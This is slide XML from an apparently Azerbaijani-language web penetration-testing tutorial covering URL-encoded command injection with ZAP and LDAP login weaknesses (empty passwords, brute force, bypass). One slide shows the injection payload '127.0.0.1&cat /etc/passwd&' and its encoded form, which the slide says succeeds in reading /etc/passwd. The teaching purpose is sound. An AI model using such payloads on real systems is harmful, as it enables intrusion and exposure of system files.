          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="3200" dirty="0"/>
              <a:t>Y</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0" err="1"/>
              <a:t>önləndirdiyimiz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0" err="1"/>
              <a:t>Domainə</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0"/>
              <a:t> giririk və </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="3200" dirty="0"/>
              <a:t>Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="3200" dirty="0" err="1"/>
              <a:t>shifə</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0"/>
              <a:t> açıqlarını yoxlayacağımız shifə açılır</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="az-Latn-AZ" sz="3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24" name="Şəkil 4" descr="Şəkil ehtiva edir mətn  Avtomatik yaradılan təsvir"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="1171" b="1708"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="6400800" cy="4275190"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2097225" name="Şəkil 6" descr="Şəkil ehtiva edir mətn  Avtomatik yaradılan təsvir"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="1178"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6400800" y="1"/>
            <a:ext cx="5791200" cy="4275190"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048761" name="Mətn Qutusu 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="66675" y="4486275"/>
            <a:ext cx="11858625" cy="1882140"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bunun üçün internetdən </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>URL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Decoder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>edəcək sayt tapırıq və </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>zaproxy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>programının</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> tapdığı </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>payloadı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> burda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Encode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> edirik çıxan nəticəni </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>kopyalayırıq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>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26" name="Şəkil 4" descr="Şəkil ehtiva edir mətn  Avtomatik yaradılan təsvir"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="815"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="0"/>
            <a:ext cx="9406647" cy="6865438"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048762" name="Mətn Qutusu 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9406646" y="243191"/>
            <a:ext cx="2785354" cy="2225041"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Kodun əvvəlki vəziyyəti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> :</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>127.0.0.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;cat /etc/passwd&amp;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="tr-TR" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="tr-TR" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="tr-TR" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Kodun sonraki v</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>əziyyəti :</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>127.0.0.1%26cat%20%2Fetc%2Fpasswd%26</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="az-Latn-AZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048763" name="Mətn Qutusu 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9406646" y="2551515"/>
            <a:ext cx="2636197" cy="3444241"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Kodun ilkin vəziyyətindən başa düşmək </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>olarki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ekrana </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>wd</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>faylını göstərmək istəyir ,sadə vəziyyətdə işə yaramır amma </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>encod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> olunmuş ikinci formasında nəticə uğurlu olur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48764" name="Başlıq 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="389300" y="235732"/>
            <a:ext cx="10281943" cy="1807077"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="7200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LDAP Servis</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="7200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="7200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   Təhlükəsizlik açığı nədir?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="7200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="7200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="az-Latn-AZ" sz="7200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFC000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048765" name="Mətn Qutusu 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="963936" y="3429000"/>
            <a:ext cx="8597246" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="az-Latn-AZ" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFC000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048766" name="Mətn Qutusu 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="486383" y="2538919"/>
            <a:ext cx="11303540" cy="3291841"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Open Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The Lightweight Directory Access Protocol (LDAP) AD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- müştərilərin serverlərdən məlumat alarkən və sorğu göndərərkən istifadə etdiyi bir protokoldur. Müştərilər və tətbiqlər LDAP əlaqələrini istifadə edərək </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Active</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Directory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> üzərindən təsdiqləyir və istədikləri məlumatlara daxil olur.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048881" name="Metin kutusu 1048880"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10507602" y="630405"/>
            <a:ext cx="2144165" cy="1513839"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr" sz="9600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>✅</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="2800">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48767" name="Başlıq 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="758951" y="758952"/>
            <a:ext cx="9007217" cy="4754880"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="7200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>LDAP Servis</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="7200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="7200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>   Təhlükəsizlik açığı</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048768" name="Mətn Qutusu 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="963936" y="3429000"/>
            <a:ext cx="8597246" cy="1348740"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>word – Bo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ş qoyma</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>assword – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Güc </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Tədbiqi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bruteforce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>word – Aradan qald</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ırma</a:t>
            </a:r>
            <a:endParaRPr lang="az-Latn-AZ" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFC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27" name="Şəkil 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect t="63278"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-1"/>
            <a:ext cx="9892724" cy="2861035"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2097228" name="Şəkil 6" descr="Şəkil ehtiva edir mətn  Avtomatik yaradılan təsvir"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="541"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2861035"/>
            <a:ext cx="12192000" cy="3996965"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048769" name="Düzbucaqlı 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1504950"/>
            <a:ext cx="2457450" cy="10668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70" name="Mətn Qutusu 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9892724" y="89376"/>
            <a:ext cx="2626774" cy="2168351"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shifənin linkində </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
